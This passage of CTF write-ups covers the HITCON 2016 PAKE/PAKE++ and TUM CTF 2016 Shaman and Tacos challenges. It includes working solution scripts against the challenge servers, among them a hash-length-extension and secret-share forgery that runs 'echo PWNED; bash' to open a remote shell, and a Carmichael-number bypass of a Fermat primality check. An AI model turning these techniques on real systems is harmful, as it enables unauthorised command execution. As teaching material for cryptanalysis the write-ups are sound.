        it->crc_forward = lift(cl, right_size + 1) ^ lift(cmid, right_size) ^ cr;

        cl = crc2(it->l);
        cr = crc2(it->r);
        it->crc_backward = cl ^ lift(cmid, left_size) ^ lift(cr, left_size + 1);
    }
}

inline void push (pitem it) {
    if (it && it->rev) {
        swap(it->crc_forward, it->crc_backward);
        it->rev = false;
        swap (it->l, it->r);
        if (it->l)  it->l->rev ^= true;
        if (it->r)  it->r->rev ^= true;
    }
}

The full solution is available here.

This code runs for ~40 minutes on my laptop and produces the final CRC: d72a4529.

The flag then is hitcon{super fast reversing and CRC32 – d72a4529}.

HITCON CTF QUALS 2016 – PAKE / PAKE++ (Crypto 250 + 150)

hellman — Mon, 10 Oct 2016 17:06:59 +0000

pake1.rb
pake2.rb

Summary: attacking password-based key exchange schemes based on SPEKE with MITM.

In these two challenges we were given a service which simply sends a flag after a session of some Password Authenticated Key Exchange (PAKE) scheme.

PAKE (The first challenge)

  fail unless is_safe_prime(p)

  # each password is an integer in 1..16
  passwords = IO.readlines('passwords').map(&:to_i)
  fail unless passwords.grep_v(1..16).empty?
  fail unless passwords.size == 11
  passwords.map!{|pass| Digest::SHA512.hexdigest(pass.to_s).to_i(16)}

  key = 0
  puts "p = #{p}"
  passwords.each.with_index(1) do |password, i|
    puts "Round #{i}"

    w = pow(password, 2, p)  # NO to Legendre
    b = 2 + SecureRandom.random_number(p - 2)
    bb = pow(w, b, p)
    puts "Server send #{bb}"

    aa = gets.to_i
    if aa < 514 || aa >= p - 514
      puts 'CHEATER!'
      exit
    end

    k = pow(aa, b, p)
    key ^= Digest::SHA512.hexdigest(k.to_s).to_i(16)
  end

  flag ^= key
  puts "Flag is (of course after encryption :D): #{flag}"

The server has 11 very small passwords: integers from 1 to 16. For each password a simple Diffie-Hellman key exchange is done, however the generator depends on the password (this is the SPEKE protocol). Then the resulting keys for all passwords are xored together.

Clearly, we can’t guess all the keys at once. On the other hand, if we fail to guess even a single key, the final key is xored with something “random” to us, something we have no information about at all. From this point of view the challenge looks unsolvable and I was stuck on it for the whole day. The challenge author even increased the points from 150 to 250 since nobody solved it for some time.

The key idea is that we can do a Man-In-The-Middle attack here, between the server and… the server itself! Indeed, the server is the only “person” who knows the passwords and can pass the protocol in a meaningful way. We can maintain two connections and for each password $p$ we will exchange the $g_p^a$ and $g_p^b$ sent to us by the server in the two connections. Then both sides will obtain the same secret for each of the passwords, $g_p^{ab}$, and the same final master key too!

It is cool that we managed to connect the server to itself, but.. the flag is still encrypted… However, now we can perform attacks on single passwords! Indeed, if we guess a password $p$ correctly, then we can compute the generator $g_p$ and perform the basic MITM attack against classical Diffie-Hellman. For example, we allow the servers to exchange keys related to the first 10 passwords, and then for the 11-th password $p$ we try to guess it and send $g_p^1$ to both servers. Then the servers will compute 11th shared keys $g_p^{a}$ and $g_p^{b}$ which they have already sent to us. Now, the final xor of the keys will be different on two servers. However, if our password guess was correct, we can unxor the last shared keys and see that the new shared keys are now equal. Thus we have obtained a way to bruteforce each password separately.
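The relay and the per-password check can be tried offline with a toy model of the service. Everything in this sketch is a stand-in: `ToyServer` and `guess_is_right` are names invented here, the modulus is a small Mersenne prime rather than the 1024-bit safe prime, and the proof-of-work and the range check on the received value are omitted.

```python
import hashlib
import secrets

P = 2**127 - 1  # toy prime modulus (assumption, not the challenge prime)

def numhash(n):
    return int(hashlib.sha512(str(n).encode()).hexdigest(), 16)

class ToyServer:
    """Local stand-in for one connection to the PAKE service."""
    def __init__(self, passwords, flag):
        self.gens = [pow(numhash(pw), 2, P) for pw in passwords]
        self.flag, self.key = flag, 0

    def send(self, i):
        self.b = 2 + secrets.randbelow(P - 2)
        return pow(self.gens[i], self.b, P)

    def receive(self, aa):
        self.key ^= numhash(pow(aa, self.b, P))

    def encrypted_flag(self):
        return self.flag ^ self.key

def guess_is_right(passwords, flag, index, guess):
    """Relay every round between two sessions, except round `index`,
    where both sessions receive the generator for our password guess."""
    s1, s2 = ToyServer(passwords, flag), ToyServer(passwords, flag)
    for i in range(len(passwords)):
        bb1, bb2 = s1.send(i), s2.send(i)
        if i != index:
            s1.receive(bb2)
            s2.receive(bb1)
        else:
            g = pow(numhash(guess), 2, P)
            s1.receive(g)
            s2.receive(g)
            # If the guess is right, the servers' round keys are hash(bb1), hash(bb2).
            rec1, rec2 = numhash(bb1), numhash(bb2)
    return s1.encrypted_flag() ^ rec1 == s2.encrypted_flag() ^ rec2

secret_passwords = [3, 14, 7]          # hypothetical passwords
flag = int.from_bytes(b"toy flag", "big")
recovered = [next(g for g in range(1, 17)
                  if guess_is_right(secret_passwords, flag, i, g))
             for i in range(len(secret_passwords))]
print(recovered)
```

Each password costs at most 16 pairs of sessions, so the whole search is linear in the number of passwords instead of exponential.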

Here is the solution script (takes a while due to the heavy PoW):

import os
from hashlib import sha512, sha1

from libnum import *
from sock import Sock

def getHashes(p1, p2):
    # bruteforce proof-of-work in C
    data = os.popen("./sha1 '%s' '%s'" % (p1, p2)).read()
    return data.split()

def numhash(n):
    return s2n(sha512(str(n)).digest())

p = 285370232948523998980902649176998223002378361587332218493775786752826166161423082436982297888443231240619463576886971476889906175870272573060319231258784649665194518832695848032181036303102119334432612172767710672560390596241136280678425624046988433310588364872005613290545811367950034187020564546262381876467
pws = [8, 15, 9, 15, 7, 7, 13, None, 10, 15, None]
pws = [None] * 11
for pwi in xrange(11):
    if pws[pwi] is not None:
        continue
    for pwc in xrange(1, 17):
        print pwi, pwc, "getting prefixes"
        f1 = Sock("52.197.112.79 20431")
        f2 = Sock("52.197.112.79 20431")
        prefix1 = f1.read_until_re(r"prefix: (\S+)").decode("base64")
        prefix2 = f2.read_until_re(r"prefix: (\S+)").decode("base64")

        sol1, sol2 = getHashes(prefix1, prefix2)
        f1.send_line(str(sol1.encode("base64").strip()))
        f2.send_line(str(sol2.encode("base64").strip()))

        recnum1 = None
        recnum2 = None
        for i in xrange(11):
            num1 = int(f1.read_until_re(r"Server send (\d+)"))
            num2 = int(f2.read_until_re(r"Server send (\d+)"))
            if i != pwi:
                f1.send_line(str(num2))
                f2.send_line(str(num1))
            else:
                gp = pow(numhash(pwc), 2, p)
                f1.send_line(str(gp))
                f2.send_line(str(gp))
                recnum1 = numhash(num1)
                recnum2 = numhash(num2)

        f1.read_until("Flag is")
        f2.read_until("Flag is")

        res1 = int(f1.read_until_re(r": (\w+)"))
        res2 = int(f2.read_until_re(r": (\w+)"))
        if res1 ^ recnum1 == res2 ^ recnum2:
            print "MATCH!", "pw[%d] = %d" % (pwi, pwc)
            pws[pwi] = pwc
            print pws
            break

After we have obtained all the passwords, we can implement the legitimate session and get the flag: hitcon{73n_w34k_p455w0rd5_c0mb1n3d_4r3_571ll_wE4k_QQ}

Pake++ (The second challenge)

In the second challenge, the scheme was slightly altered. There are now 8 different prime moduli, and each time the prime to be used is chosen at random. Also there is only one password and it has very high entropy. Finally, each session now has two rounds. Each round a prime is chosen at random again, but the password is always the same.

  primes = <<-EOS.lines.map(&:to_i)
  285370232948523998980902649176998223002378361587332218493775786752826166161423082436982297888443231240619463576886971476889906175870272573060319231258784649665194518832695848032181036303102119334432612172767710672560390596241136280678425624046988433310588364872005613290545811367950034187020564546262381876467
  298619967637074381179969535203891334279037109216429406440598651658759350405543564192161651312771530156893413427058175045425757160212464963471306913768112396967665485652095651332292521663596653434043497333804676303590560939622585332770724390627970615864007468306226942254398801398715678948641382895998651226267
  298049748677563805780319663628819960854615659462424022507630185085633596966175010904970480952385372951172828141165347514534458425242085310886903778569556019799929063608007455863031014344586675081359600240391009588905845818495639778564642452193502269859322492791462878008970754999615280381704729202349939626979
  328517416048692886037451935540065593512994462002198409216093662374867257380362145180594029938263095492728312598227855130627235361314817436633177786884494030007864152308901161140111969980403722704138376439893801083486571959976238463025246682645769458504940248785078868650651872930977987712522710703736396657387
  282394389781374199382509925858094901774563649174745796339967395605116291562054020073955455338401167970080036287402587308354538500190221028476399923564634339732689941702464496890308354549764266506953808881910012117986860385319905877301417806557760524821229657147194856430018136428864202922733288830153277890659
  323103830544117987011024048071694067643223166857443601288678625077550042396643402625692490043863582981782378717042298512462563264457088124223575174164921578128007273839310675925364961100802146846497562297376569657569712628347758371790366124768858903423043207000026049079160253301902404207920358137230602539643
  302103350544659483531131684583742544907887033086695553935842864801685693649953339273310786890360791425112212069129996061391578244584149171226282625727635376367322205108426287980490462476857893899354488802419996817239780781622440165425711955277936322570946121224712118336303389972089563531346006960196427704219
  274405967560432033789798999119890457360306712028734789799802515309420810630484361406114488871989143593759704555407742610118391422809479638606936598462341976320928990585877751200977318034499800109548890002507225944134922612505410751207789339655283747859299017222586400523098060723763539689025418276604564593619
  EOS
  fail unless primes.all?{|p| is_safe_prime(p)}

  password = IO.read('password2').strip
  fail unless password =~ /\A[a-zA-Z0-9]{20}\z/
  password = Digest::SHA512.hexdigest(password).to_i(16)

  key = 0
  2.times do |i|
    puts "Round #{i + 1}"

    p = primes[SecureRandom.random_number(primes.size)]
    puts "p = #{p}"

    w = pow(password, 2, p)  # NO to Legendre
    b = 2 + SecureRandom.random_number(p - 2)
    bb = pow(w, b, p)
    puts "Server send #{bb}"

    aa = gets.to_i
    if aa < 514 || aa >= p - 514
      puts 'CHEATER!'
      exit
    end

    k = pow(aa, b, p)
    key ^= Digest::SHA512.hexdigest(k.to_s).to_i(16)
  end

  flag ^= key
  puts "Flag is (of course after encryption :D): #{flag}"

Now that we know the MITM idea, it is not much harder. If we manage to get the same primes in two connections and simply exchange the values sent, we will get the same key in both connections. However, two connections are not enough: we can’t get the flag from $flag \oplus stuff1$ and $flag \oplus stuff2$, whether or not the keys are equal. For example, if we xor these two things together, the flag is cancelled. To avoid this we simply add a third connection! Then the triple xor of $flag \oplus stuff$ will still contain $flag$ and hopefully we can cancel all the stuff.

Indeed, we can try to make the following key exchanges between connections $a, b, c$:

$$\begin{split}
k_1 = key\_exchange(a, b), \\
k_2 = key\_exchange(a, c), \\
k_3 = key\_exchange(b, c).
\end{split}$$

Then we will get:

$$\begin{split}
flag \oplus k_1 \oplus k_2 ~\mbox{from}~ a, \\
flag \oplus k_1 \oplus k_3 ~\mbox{from}~ b, \\
flag \oplus k_2 \oplus k_3 ~\mbox{from}~ c.
\end{split}$$

Xoring everything results in the flag!

There are some technicalities. We need to distribute these three exchanges between the 2 rounds of the 3 connections. This is easy, since the servers do not necessarily need to perform an exchange in the same round.
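The cancellation is plain xor arithmetic and can be checked in a few lines. The flag and the keys below are random placeholders, not values from the challenge.

```python
import secrets

flag = int.from_bytes(b"hitcon{placeholder}", "big")  # placeholder flag
k1, k2, k3 = (secrets.randbits(512) for _ in range(3))

from_a = flag ^ k1 ^ k2   # connection a took part in exchanges 1 and 2
from_b = flag ^ k1 ^ k3   # connection b took part in exchanges 1 and 3
from_c = flag ^ k2 ^ k3   # connection c took part in exchanges 2 and 3

# Every key appears exactly twice and cancels; the flag appears three times.
recovered = from_a ^ from_b ^ from_c
print(recovered.to_bytes(19, "big"))

# With only two connections the flag itself appears twice and cancels.
two_only = (flag ^ k1) ^ (flag ^ k1)
```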

A slightly harder problem is to wait until the primes match in a right way. We can do the following:

Open several connections until there is a pair of connections with the same prime $p_{ab}$ in the first round.
Perform the exchange between them.
See the second round primes $p_a$ and $p_b$.
Find a client in the pool or make new connections until we get a connection with the first round prime equal to either $p_a$ or $p_b$.
Perform the exchange between the corresponding connections.
Now we have no choice and only one exchange left to do. If the primes do not match, we repeat the full algorithm.
Otherwise, we get the flag.

The flag: hitcon{m17m_f0r_pr0f1t_bu7_S71ll_d035n7_kn0w_p455w0rd}

TUM CTF 2016 – Shaman (Crypto 500)

hellman — Mon, 03 Oct 2016 20:02:07 +0000

Oh great shaman!

Somehow the village idiot got his hands on this fancy control machine controlling things. Obviously, we also want to control things (who wouldn’t?), so we reverse-engineered the code. Unfortunately, the machine is cryptographically protected against misuse.

Could you please maybe spend a few seconds of your inestimably valuable time to break that utterly simple cryptosystem and enlighten us foolish mortals with your infinite wisdom?

nc 104.155.168.28 31031

vuln.py

NOTE: Since I am really bad at math, the share received from the server won’t be accepted when sent back. Don’t get confused by this — the challenge is solvable nevertheless.

Summary: hash length extension, manipulation of secret shares.

The challenge server consists of a mix of secret sharing, authentication and command execution. Briefly, it works as follows:

The server generates a command of the form
cmd = checksum + "echo Hello!#" + [32 random bytes],
and interprets it as an integer modulo 256-bit prime $p$.
The server splits the command into 3 shares with threshold equal to 2, meaning that knowing any 2 of the 3 shares is enough to recover the secret. Shamir’s secret sharing is used (using polynomials over $\mathbb{F}_p$).
One of the shares is signed by prepending a MAC:
signed_share = SHA256(key + share) + share.
The signed share is sent to the client.
Now the server listens to queries from the client; the number of queries is limited to 0x123.

In each query, the client can send a signed share.
The server combines it with another share.
The server checks the checksum and if it is good, executes the command.

Modifying the share

First observation: if the MAC is good enough, we can’t generate any other signed share and therefore we can’t execute any command other than “echo Hello”. Therefore we have to attack the MAC. Luckily, it is vulnerable to the well known Hash Length Extension attack. There is a very convenient tool called hash_extender for performing the attack.

The attack allows us, given a hash of the form SHA256(key + share), to append some uncontrolled padding and, additionally, arbitrary amount of data to the hash input. This appending is done in such a way that we can compute the new hash value without knowing the key. That is, we can generate more signed shares of the form share + [padding] + [any data].

What does it give to us? The share has the following format: (32-byte $x$, 32-byte $y$) and the values are packed in the Little Endian order (least significant bytes first). When the values are unpacked, everything after $y$ will be considered as a part of $y$. Even if it’s more than 32 bytes, it will be taken modulo $p$. That is, we can modify the share’s $y$ by adding $(2^{256} \times padding + 2^{256+e} \times value)$ to it, where $e$ is determined by padding. Since it is reduced modulo $p$ afterwards, we can actually obtain arbitrary $y_{wanted}$. Indeed, setting $$value \equiv (y_{wanted} - y_{orig} - 2^{256} \times padding) / 2^{256+e} \pmod {p}$$ will do the job.
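The arithmetic can be checked in isolation, without any hashing. In this sketch the prime, the padding bytes and the function name `extend_y` are all stand-ins chosen for illustration; only the little-endian unpacking and the reduction modulo the prime follow the description above.

```python
P = 2**256 - 2**32 - 977   # stand-in prime (assumption), not the server's p

def extend_y(y_bytes, padding, y_wanted):
    """Bytes to append after y + padding so that the whole thing,
    unpacked as one little-endian integer, equals y_wanted modulo P."""
    prefix = y_bytes + padding
    e = 8 * len(prefix)                         # bit offset of the appended value
    trash = int.from_bytes(prefix, "little") % P
    value = (y_wanted - trash) * pow(2, -e, P) % P
    return value.to_bytes(32, "little")

y_orig = (123456789).to_bytes(32, "little")
padding = b"\x80" + b"\x00" * 21 + b"\x03\x00"  # made-up padding bytes
y_wanted = 0xC0FFEE

forged = y_orig + padding + extend_y(y_orig, padding, y_wanted)
print(int.from_bytes(forged, "little") % P == y_wanted)
```

In the real attack the padding is not ours to choose: it is whatever SHA256 padding the length extension forces, which is why it is treated as an uncontrolled constant here.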

Here’s python code for modifying the signed share’s $y$ component to arbitrary value:

# hash_extender is a wrapper around the command line hash_extender
# trick: first we append nothing to obtain the base value
testdata, _sig = hash_extender(
    data=share,
    hash=sig,
    append="",
    hashname="sha256",
    length=keylen
)
# y = 2^e * c + sometrash (mod p)
# c = (y - sometrash) / 2^e (mod p)
e = len(testdata) * 8
inv2e = invmod(2**e, p)
trash = from_bytes(testdata) % p

def gen_share_with_y(y):
    c = (y - trash) * inv2e % p
    newdata, newsig = hash_extender(data=share, hash=sig, append=to_bytes(c), hashname="sha256", length=keylen)
    return newsig + newdata.encode("hex")

Digging into the secret sharing

Our final goal is to execute some evil command on the server. The command is obtained from combining the two shares: our share and one of the server’s shares. We can partially modify our share, but the server’s share stays untouched! Is it still possible to modify the command in a meaningful way? Hoping for lucky random commands (like “sh\n”) is a bad idea, since the command is prepended by a SHA256 checksum…

Let’s look closer at the sharing scheme. When splitting the shares, the server creates a random polynomial of degree 1 (it has (threshold) coefficients) with the constant coefficient equal to the secret being shared. Then it is evaluated on three random points, and the three $(x_i, y_i)$ pairs are the shares. For a polynomial of degree 1, any two different points are enough to recover the full polynomial, that’s how it works! The interpolation algorithm is implemented on the server and we actually don’t care about the implementation, we care only about semantics of it.

We can think about the combining step as follows: the server has two shares $(x_1, y_1)$ and $(x_2, y_2)$ and it wants to find two coefficients $a, b$ in the finite field $\mathbb{F}_p$ for which the equation $a*x + b = y$ holds for both shares. That is, it solves the following linear system with two unknowns $a, b$:

$$\begin{cases}
a x_1 + b = y_1,\\
a x_2 + b = y_2,\\
\end{cases}$$

Then $b$ is the constant coefficient in the polynomial and so is the initial secret.

Let’s say our share is number 2, so we control $y_2$. Let’s solve the system for $b$:

$$\begin{split}
a & = & \frac{y_1 - y_2}{x_1 - x_2}, \\
b & = & y_2 - a x_2 = y_2 - x_2\frac{y_1 - y_2}{x_1 - x_2} = y_2 - u + y_2 / v = w y_2 - u.
\end{split}$$

Note that we have done some variable replacements, since we don’t really care about all values $(x_1, y_1, x_2)$, but only about the minimum number of expressions involving them. We obtained that the algorithm the server uses to combine the shares is basically a linear function of $y_2$, which we control! So we have only two unknowns, the coefficients $w$ and $u$! How can we learn them? Obviously we need to get some information from the server, since we know nothing about the share #1.
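A small sketch makes the linearity concrete. The prime and the names `combine` and `affine_coeffs` are assumptions made for this illustration; in the attack itself $w$ and $u$ are of course unknown and have to be learned through the server.

```python
P = 2**256 - 2**32 - 977   # stand-in prime (assumption), not the server's p

def combine(share1, share2):
    """Recover f(0) for the line through two shares (x, y) over F_P."""
    (x1, y1), (x2, y2) = share1, share2
    a = (y1 - y2) * pow((x1 - x2) % P, -1, P) % P
    return (y2 - a * x2) % P

def affine_coeffs(share1, x2):
    """Coefficients (w, u) with combine(share1, (x2, y2)) == w*y2 - u."""
    x1, y1 = share1
    inv = pow((x1 - x2) % P, -1, P)
    return x1 * inv % P, x2 * y1 * inv % P

# Share a secret with the line f(x) = 7x + 42.
f = lambda x: (7 * x + 42) % P
server_share, our_x = (5, f(5)), 9
print(combine(server_share, (our_x, f(our_x))))      # the shared secret

# Knowing w and u, any target secret can be forced by choosing y2.
w, u = affine_coeffs(server_share, our_x)
target = 0xDEADBEEF
y2 = (target + u) * pow(w, -1, P) % P
print(combine(server_share, (our_x, y2)) == target)
```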

Recovering the linear coefficients

For simplicity, let’s rename variables and assume that the server computes $secret \equiv a y_2 + b \pmod{p}$ ($a$ and $b$ are the new unknowns, unrelated to previous ones).
Since we have no information about $a, b$ we can’t set $secret$ in a meaningful way at first. Therefore the checksum check will fail… and the server will leak a part of the $secret$ that it combined!

def unpack(msg, key = b''):
    tag = msg[:SHA.digest_size]
    if tag == SHA.new(key + msg[len(tag):]).digest():
        return msg[len(tag):]
    print('bad {}: {}'.format(('checksum', 'tag')[bool(key)], tohex(tag)))

Unluckily, the server leaks only the 256 least significant bits of the secret (out of 512). To sum up, we have the following oracle:

(Share with $y_2$) $\mapsto$ (256 LSBs of the resulting secret).

First, we can query $y_2 = 0$ and obtain the LSBs of $secret = (a \cdot 0 + b) \mod{p} = b$. Then we can query $y_2 = 1$ and obtain the LSBs of $(a + b) \mod{p}$, which quite often will be equal to just the LSBs of $a + b$ (when the sum does not overflow the modulus), therefore we can also learn the LSBs of $a$. So, we can learn the 256 LSBs of $a$ and $b$ in 2 queries.

Now, let’s try to shift $a$ down so that we learn the MSBs of it. To do this we set $y_2$ to $2^{-256} \pmod{p}$. However this is not exactly the shift due to modulo $p$. What we obtain is:

$$(y_2 a + b) \mod{p} = (2^{-256} a + b) \mod {p} = ((a + kp) / 2^{256} + b) \mod {p},$$

where $k$ is such that $a + kp \equiv 0 \pmod{2^{256}}$ and the last division is done in integers. Luckily, we know the LSBs of $a$, that is, we know $a \mod{2^{256}}$, so we can predict the LSBs of $k$:

$$k \equiv -a/p \pmod{2^{256}}.$$

Now comes an interesting point. The smallest such $k = k_0$ is less than $2^{256}$. All other $k$ satisfying this condition can be described as $k = k_0 + t2^{256}$ for some integer $t$. Note that:

$$\begin{split}
((a + kp) / 2^{256} + b) \mod{p} & = & ((a + k_0p + 2^{256}tp) / 2^{256} + b) \mod{p}\\
& = & ((a + k_0p) / 2^{256} + b + tp) \mod{p},
\end{split}$$

…and $tp$ goes away due to modulo! This means that we need to know only $k \equiv -a/p \mod{2^{256}}$, which we can compute as mentioned before.
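This is the same observation that underlies Montgomery reduction, and it is easy to confirm numerically. The modulus below is a stand-in odd prime chosen for illustration, and `shifted` is a made-up helper name.

```python
import secrets

P = 2**521 - 1        # stand-in odd prime (assumption), not the server's p
R = 2**256

def shifted(a):
    """(a * 2^-256) mod P, computed with an exact integer division."""
    k = (-a * pow(P, -1, R)) % R      # k = -a/p mod 2^256
    assert (a + k * P) % R == 0       # a + k*p is divisible by 2^256
    return (a + k * P) // R

a = secrets.randbelow(P)
print(shifted(a) == a * pow(R, -1, P) % P)

# k depends only on the low 256 bits of a:
k_from_low_bits = (-(a % R) * pow(P, -1, R)) % R
k_from_full_a = (-a * pow(P, -1, R)) % R
```

For $a < p$ and $k < 2^{256}$ the quotient $(a + kp)/2^{256}$ is already below $p$, so no further reduction is needed.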

Moreover, we can guess whether the last addition of $b$ overflowed the modulo or not. Let’s assume that it did not, it is quite probable. Then for the query $y_2 = (2^{-256} \mod{p})$ we get (note the modulo change):

$$r = (2^{-256}a + b) \mod{p} \equiv (a + kp) / 2^{256} + b \pmod{2^{256}}.$$

Then using known LSBs of $b$ we get:

$$2^{256} (r - b) \equiv a + kp \pmod {2^{512}}.$$

$$a \equiv 2^{256} (r - b) - kp \pmod {2^{512}}.$$

We learned the full $a$! Recall that we assumed that the addition of $b$ does not overflow the modulus. We can guess this and try to add $p$, or first choose $y_0=2^{-128}$ instead of $y_0=2^{-256}$ and learn the full $a$ in two steps. This trick allows us to notice the additional subtraction of $p$, since in the first query half of the obtained bits should match the known bits of $a$.

Ok, how to learn the full $b$ now? Sadly, we can’t shift it and the effect of its high bits is quite limited. We can now exploit the effect of $b$ on overflowing the modulus: for specially crafted queries we will check how many times we overflow the modulus and deduce some information about $b$. Recall that we can query

$$(ay_0 + b) \mod {p} = ay_0 + b -kp$$

for some $k$. Note that since $b < p$, its value may change $k$ only by $1$. Let's perform a binary search for the real value of $b$. Assume that we know that $b_l \le b \le b_r$ for some known $b_l, b_r$. Let $mid = (b_l + b_r) / 2$. Then we can craft such $y_0$ that for all $b_l \le b < mid$ we will get known $k = k_0$ and for $mid \le b \le b_r$ we will get $k = k_0 - 1$. Such $y_0$ can be obtained as $y_0 \equiv -mid / a \pmod{p}$, since then $$(y_0 a + b) \mod{p} = (b - mid) \mod{p}$$ and then we will get either $b - mid$ or $b - mid + p$. Since we know the LSBs of $b$ and $mid$, we can easily distinguish between the two cases and divide the search space for $b$ by 2. Note that we need to learn only the 256 MSBs of $b$, so we are good with around 256 queries for this binary search.

To sum up, we need 2 queries to learn LSBs of $a$ and $b$, 2 queries to learn full $a$ and at most 256 queries to learn full $b$.

Here’s python code for recovering $a, b$:

def oracle(y):
    assert 'what have you got' in f.read_line()
    f.send_line(gen_share_with_y(y))
    res = f.read_line()
    assert "bad checksum" in res, "oracle failed: %r" % res
    return from_bytes(res.split()[-1].decode("hex"))

MOD = 2**256
blow = oracle(0) % MOD
alow = (oracle(1) - blow) % MOD
i2 = invmod(2, p)
a = alow
for e in (128, 256):
    mod2 = 2**e
    k = invmod(p, mod2) * (-a) % mod2
    assert (a + k * p) % mod2 == 0

    res = (oracle(i2**e) - blow) % MOD
    shifted = ((res << e) - k * p) % (MOD << e)
    # did we get additional -p because of b?
    if shifted % MOD != a % MOD:
        res = (oracle(i2**e) - blow + p) % MOD
        shifted = ((res << e) - k * p) % (MOD << e)
        assert shifted % MOD == a % MOD
    a |= shifted

print "Learned full   a:", tohex(a)
if a >= p:
    assert 0, "Failed, seems in the second query there was an overflow."

ia = invmod(a, p)
bl = 0
br = p - a - 1
while bl < br:
    mid = (bl + br) // 2
    x = ia * (-mid) % p
    assert (x*a + mid) % p == 0
    res = oracle(x) % MOD
    if res == (blow - mid) % MOD:
        bl = mid
    elif res == (blow - mid + p) % MOD:
        br = mid - 1
    else:
        assert 0, "Failed, seems in the second query there was an overflow."
    if bl >> 256 == br >> 256:
        break

b = br - br % MOD + blow
print "Learned full   b:", tohex(b)

if b >= p:
    assert 0, "Failed, seems in the second query there was an overflow."

Forging the Evil Command

Finally, when we have learned $a$ and $b$, we can forge and execute arbitrary commands:

def pack(msg, key=''):
    return SHA.new(key + msg).digest() + msg

packed = from_bytes(pack(r"echo PWNED; bash"))
assert packed < p
y = (packed - b) * ia % p
assert (a * y + b) % p == packed

print "Command executing:"
assert 'what have you got' in f.read_line()
f.send_line(gen_share_with_y(y))
f.interact()

In half of the runs we will get a shell!

TUM CTF 2016 – Tacos (Crypto 400)

hellman — Sun, 02 Oct 2016 17:50:57 +0000

All my fine arts and philosophy student friends claim discrete logarithms are hard. Prove them wrong.

nc 104.198.63.175 1729

vuln_tacos.py

Summary: bypassing Fermat primality test with Carmichael numbers and solving discrete logarithm using Pohlig-Hellman algorithm.

The source code is quite simple:

def is_prime(n):
    for _ in range(42):
        if pow(random.randrange(1, n), n - 1, n) != 1:
            return False
    return True

q, p = int(input(), 0), int(input(), 0)

assert 2 ** 1024 < p < q < 2 ** 4096
assert is_prime(q)
assert not (q - 1) % p
assert is_prime(p)

g = random.randrange(1, q)
y = pow(g, random.randrange(q - 1), q)
print(hex(g), hex(y))
signal.alarm(60)

# good luck!
if pow(g, int(input(), 0), q) == y:
    print(open('flag.txt').read().strip())

We need to supply a large prime modulus $q$ whose multiplicative group has a large subgroup of prime order $p$, and then the server asks us to compute a discrete logarithm modulo $q$. There are no known efficient algorithms for this setting. However, we can bypass one of the conditions: the primality test. is_prime uses the Fermat test, and it is well known that Carmichael numbers fool this test easily. Note that Carmichael numbers do not pass the Fermat test in 100% of cases! A Carmichael number $n$ passes only when the witness (base) is coprime to $n$; otherwise the check fails, since the base shares a nontrivial factor with $n$. Nonetheless, the Fermat test rejects composite numbers that are not Carmichael with much higher probability, so Carmichael numbers are our only hope here.
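To make the claim about witnesses concrete, here is a small Python 3 sketch using 561, the smallest Carmichael number. The helper name fermat_passes is ours; the 42 rounds mirror the challenge's is_prime.

```python
from fractions import Fraction
from math import gcd

def fermat_passes(a, n):
    """One round of the Fermat test with base a."""
    return pow(a, n - 1, n) == 1

n = 561  # 3 * 11 * 17, the smallest Carmichael number
passing = [a for a in range(1, n) if fermat_passes(a, n)]
coprime = [a for a in range(1, n) if gcd(a, n) == 1]

# Exactly the bases coprime to n pass, so one round succeeds with
# probability phi(n) / (n - 1) when the base is drawn from [1, n - 1].
one_round = Fraction(len(coprime), n - 1)
all_rounds = one_round ** 42   # the challenge runs 42 rounds
print(passing == coprime, one_round, float(all_rounds))
```

With prime factors as small as 3, the chance of surviving 42 rounds is tiny, which is why a usable false prime should have only fairly large prime factors.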

Bypassing primality test

Assume that we can generate Carmichael numbers of ~3000 bits with lots of small prime factors. There are two paths here:

Generate Carmichael $q$ (false prime) until we can find a large real prime factor $p$ of $q-1$. In such case we will be able to do discrete log modulo each prime factor of $q$ and then combine them using CRT.
Generate Carmichael $p$ (false prime) until we can find a large real prime $q$ for which $p | (q - 1)$. In this case we will have to do discrete log modulo large prime $q$, but separately for each of the small subgroups (obtained from factorization of $p$).

For both ways we would need the Pohlig-Hellman method, but in the second case the arithmetic will be much heavier (since all small logs must be done modulo the large $q$). Also, it is easier to find a smaller prime $p$ than a large prime $q$. Therefore, the first way is preferable.

The way we will find $p$ is simple: first we obtain some Carmichael number $q$, then we remove small factors from $q$ by let's say trial division. Then we check if the result is prime. It should happen quite often!

Now the problem is: how do we generate Carmichael numbers? One of the basic algorithms is the Erdős algorithm, described for example in this paper:

Here is my implementation of its simplest randomized version in Sage:

from sage.all import *
import operator

first_primes = list(primes(10**7))

# it is important to find good lambda
# the algorithm highly depends on it
# this one is from some paper
factors = [2**5, 3**2, 5, 7, 11, 13, 17]
lam = reduce(operator.mul, factors)
# lam = /\ = 24504480

P = []
for p in primes(min(10000000, lam)):
    # do not include large primes so that Fermat test
    # has higher probability to pass
    if p < 400:
        continue
    if lam % p and lam % (p - 1) == 0:
        P.append(p)

print "P size", len(P)

prodlam = reduce(lambda a, b: a * b % lam, P)
prod = reduce(lambda a, b: a * b, P)

# faster prime checks
proof.arithmetic(False)

while 1:
    numlam = 1
    num = 1
    # we are building random subset {p1,...,p20}
    # and checking the subset at each step
    for i in xrange(20):
        p = choice(P)
        numlam = numlam * p % lam
        num = num * p
        if numlam != prodlam or prod % num != 0:
            continue
        q = prod // num
        print "candidate", q
        print factor(q)
        print
        ps = [p for p, e in factor(q)]
        is_carm = ( (q - 1) % lcm([p-1 for p in ps]) == 0 )
        if not is_carm:
            continue

        # now check if q - 1 = small primes * large prime p
        # since we need to know such p
        # should happen by chance quite often
        t = q - 1
        # strip small factors; use a separate name so that
        # the large cofactor t is what gets reported as p
        for sp in first_primes:
            while t % sp == 0:
                t //= sp
        if is_prime(t):
            print "Good!"
            print "q =", q, "#", len(q.bits()), "bits"
            print "p =", t, "#", len(t.bits()), "bits"
            print
            open("candidates", "a").write("q = %d\n" % q)
            open("candidates", "a").write("p = %d\n\n" % t)

# solution:
q = 59857999685097510058704903303340275550835640940514904342609260821117098340506319476802302889863926430165796687108736694628663794024203081690831548926936527743286188479060985861546093711311571900661759884274719541236402441770905441176260283697893506556009435089259190308034118717196693029323272007089714272903225216389846915864612112381878100108428287917605430965442572234711074146363466926780699151173555904751392997928289187479977403795442182731620805949932616667193358004913424246140299423521
p = 62524500763431441748481642690708441489776386892126187254070724779722504054292898512943722029745633023670685560530873804922086432332770562190282869379418979194485569141426416326281184435782910942683630763055432514713734358605440032411156894024431274583468338817956399407807741136790938228633811230955007519469063632837378284757301519562677312080310137628454021752642170957113443979650111115572728879157653822412120689975685302219422272533094042684647476957834486986793341

It takes around 30-60 minutes to find a solution, for example:

